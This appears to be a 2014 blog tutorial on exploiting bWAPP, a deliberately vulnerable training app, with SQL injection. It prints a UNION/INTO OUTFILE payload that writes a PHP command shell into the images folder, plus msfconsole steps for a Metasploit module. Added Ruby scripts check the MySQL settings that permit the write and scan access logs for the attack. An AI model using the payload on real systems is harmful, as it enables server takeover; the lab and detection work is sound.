Saturday, June 28, 2014

bWAPP - Metasploit Modules

Hi little bees,

In this article, I'll show you how to find an exploit in bWAPP and port it to a Metasploit module to ease the exploitation of your beloved bee-box (or any box running bWAPP).
You probably all know the Metasploit Framework. If you don't know it yet, you should absolutely take a look at its website and download/install it. If you're using Kali Linux, Metasploit is already present in your beehive.

First, we need to find a valid exploit. For now, I'll take a basic SQL injection to spawn a shell/meterpreter on the box.



I'm a little lazy and the basics of SQL injection are out of scope, so if you don't know how to exploit it in bWAPP, you can still refer to my (killed in the beehive) bwappexploited site.

So, starting from the fact that this injection works well to get the current database:
 
' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
 
We could abuse the MySQL SELECT ... INTO OUTFILE statement to write a PHP file, our backdoor, onto the web server.
But don't forget that it is the MySQL server doing the writing, so the mysql user (or a group it belongs to) must have write permission on the folder where you want to write the backdoor.
An image or document folder is often a good choice, as it is typically used to upload images through an admin web interface.
In this case, the « images » folder is writable :) (http://yourip/bWAPP/images/)
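From the defender's side, the two server-side conditions that make this INTO OUTFILE write possible are the FILE privilege on the database account and an unrestricted secure_file_priv setting. The following Ruby script is an added example, not code from this post or from the bWAPP project: it takes the text of SHOW GRANTS and the value of secure_file_priv (both constructed samples here, with a hypothetical 'bwapp' account) and reports whether the SQL layer would even allow a write to the images folder, before OS permissions are considered.

```ruby
require 'pathname'

# Constructed sample values (not taken from a real server): the output of
#   SHOW GRANTS FOR CURRENT_USER();
#   SHOW VARIABLES LIKE 'secure_file_priv';
# for a bee-box style setup (web app connects as root, no restriction) and
# for a hardened setup (hypothetical dedicated account, writes pinned to a
# directory outside the web root).
LAX_GRANTS      = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"].freeze
LAX_SFP         = ''                      # empty string: no restriction at all
HARDENED_GRANTS = ["GRANT USAGE ON *.* TO 'bwapp'@'localhost'",
                   "GRANT SELECT, INSERT, UPDATE, DELETE ON `bwapp`.* TO 'bwapp'@'localhost'"].freeze
HARDENED_SFP    = '/var/lib/mysql-files/' # writes confined to this directory

# FILE is a global privilege, so it can only be granted ON *.*;
# ALL PRIVILEGES on *.* includes it.
def file_privilege?(grants)
  grants.any? do |g|
    m = g.match(/\AGRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO/i)
    next false unless m
    privs = m[1].split(',').map { |p| p.strip.upcase }
    privs.include?('ALL PRIVILEGES') || privs.include?('FILE')
  end
end

# secure_file_priv semantics: NULL disables file import/export entirely,
# an empty string allows any path, a directory restricts writes to it.
def outfile_allowed?(secure_file_priv, target_path)
  return false if secure_file_priv.nil? || secure_file_priv.casecmp('NULL').zero?
  return true  if secure_file_priv.empty?
  base   = Pathname.new(secure_file_priv).cleanpath.to_s
  prefix = base == '/' ? '/' : base + '/'
  Pathname.new(target_path).cleanpath.to_s.start_with?(prefix)
end

# Combines both checks from the SQL layer's point of view. Even when this
# returns :sql_layer_allows, the file only appears if the OS account the
# MySQL server runs as can write to the target directory.
def assess_outfile(grants, secure_file_priv, target_path)
  return :blocked_no_file_privilege  unless file_privilege?(grants)
  return :blocked_by_secure_file_priv unless outfile_allowed?(secure_file_priv, target_path)
  :sql_layer_allows
end

if __FILE__ == $PROGRAM_NAME
  target = '/var/www/bWAPP/images/yabadooo.php'
  puts "lax setup:      #{assess_outfile(LAX_GRANTS, LAX_SFP, target)}"
  puts "hardened setup: #{assess_outfile(HARDENED_GRANTS, HARDENED_SFP, target)}"
end
```

Either fix on its own closes this path: give the web application its own database account without FILE, or set secure_file_priv to a directory the web server never serves (or to NULL). Keeping the web root unwritable by the mysql OS user is the third, independent layer.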

Our payload could be something like this:

a' UNION SELECT 1, "<?php system($_GET['cmd']) ?>",1,1,1,1,1 INTO OUTFILE "/var/www/bWAPP/images/yabadooo.php" -- -

Of course, change the path if bWAPP is installed in another directory.
If our injection worked, a file named yabadooo.php containing our payload is present in the « images » folder; let's call it with the « id » command to see which user serves our payload.
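The same two requests leave a clear trace in the web server's access log: a query string carrying UNION SELECT / INTO OUTFILE with a PHP open tag, followed by a hit on a .php file under the images folder. The following Ruby scanner is an added example, not part of this post or of bWAPP: it URL-decodes each request target (repeatedly, so double-encoded payloads are not missed) and flags the lines matching those patterns. The three log lines are constructed for the example; the parameter names are hypothetical. A POST body, as in the inject1.php step, is not in a plain access log, so the same rules would have to run on a WAF or application log that records bodies.

```ruby
require 'cgi'

# Constructed sample lines in Apache common log format (not real traffic):
# a benign search, the injection from this post, then the dropped file being called.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [28/Jun/2014:10:00:01 +0200] "GET /bWAPP/inject1.php?title=Iron+Man&action=search HTTP/1.1" 200 5123
  10.0.0.9 - - [28/Jun/2014:10:00:07 +0200] "GET /bWAPP/inject1.php?title=a%27+UNION+SELECT+1%2C%22%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29+%3F%3E%22%2C1%2C1%2C1%2C1%2C1+INTO+OUTFILE+%22%2Fvar%2Fwww%2FbWAPP%2Fimages%2Fyabadooo.php%22+--+-&action=search HTTP/1.1" 200 4871
  10.0.0.9 - - [28/Jun/2014:10:00:15 +0200] "GET /bWAPP/images/yabadooo.php?cmd=id HTTP/1.1" 200 61
LOG

# Request line inside a common/combined log entry.
REQUEST_RE = %r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"}

# Rules applied to the fully decoded, lowercased request target.
RULES = {
  'sqli_union'    => /\bunion\s+(?:all\s+)?select\b/,
  'sqli_outfile'  => /\binto\s+(?:out|dump)file\b/,
  'php_in_param'  => /<\?php/,
  # A PHP script served from the image directory is suspicious by itself;
  # [^?]* keeps this rule on the path and out of the query string.
  'php_in_images' => %r{\A[^?]*/images/[^/?]+\.php(?:\?|\z)}
}.freeze

# Decode percent-encoding until it stops changing (bounded), so %2527 -> %27 -> '.
def deep_decode(str, rounds = 3)
  rounds.times do
    decoded = CGI.unescape(str)
    break if decoded == str
    str = decoded
  end
  str
end

# Names of the rules matching one log line ([] for unparsable or benign lines).
def match_rules(line)
  m = REQUEST_RE.match(line)
  return [] unless m
  target = deep_decode(m[:target]).downcase
  RULES.select { |_, re| target.match?(re) }.keys
end

# Scans a whole log text; returns one hash per flagged line.
def scan_log(text)
  text.each_line.map do |line|
    rules = match_rules(line)
    next if rules.empty?
    { client: line.split(' ', 2).first, target: REQUEST_RE.match(line)[:target], rules: rules }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |f| puts "#{f[:client]} #{f[:rules].join(',')} #{f[:target]}" }
end
```

The second hit is the more valuable signal: a new .php file under a directory meant for static images is abnormal regardless of how it got there, so an alert on it does not depend on catching the injection itself.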



It worked! But ... you already knew it? ;)

To build a Metasploit module, you have to answer this question: which steps were necessary to exploit it successfully?

In our case it's rather simple:
1 – Login to bWAPP
2 – Post evil parameters to inject1.php

Here are the details of the first step:



As you can see, we first connect to bWAPP to store the session cookie, then we use this cookie to log in to bWAPP.
 
Finally, in the second step, we call the hive function to log in, then we send the evil request to get our shell.
Metasploit generates the payload for us: just replace the PHP command in the SQL injection with « payload.encoded » and let MSF do its job.



The bulk of the work is done; the rest will become clear as you read, so I'll let you explore the final script.

You'll find the msf module here, just copy/paste it into the MSF modules folder.
Kali users can drop it in /usr/share/metasploit-framework/modules/exploits/multi/http/ .
Start msfconsole and type:
> use exploit/multi/http/bwapp-sqli
> set RHOST <bWAPP IP ADDRESS>
> exploit -j

And magic happens :)

That's all bees,
Thanks for reading !

David Bloom
Twitter : @philophobia78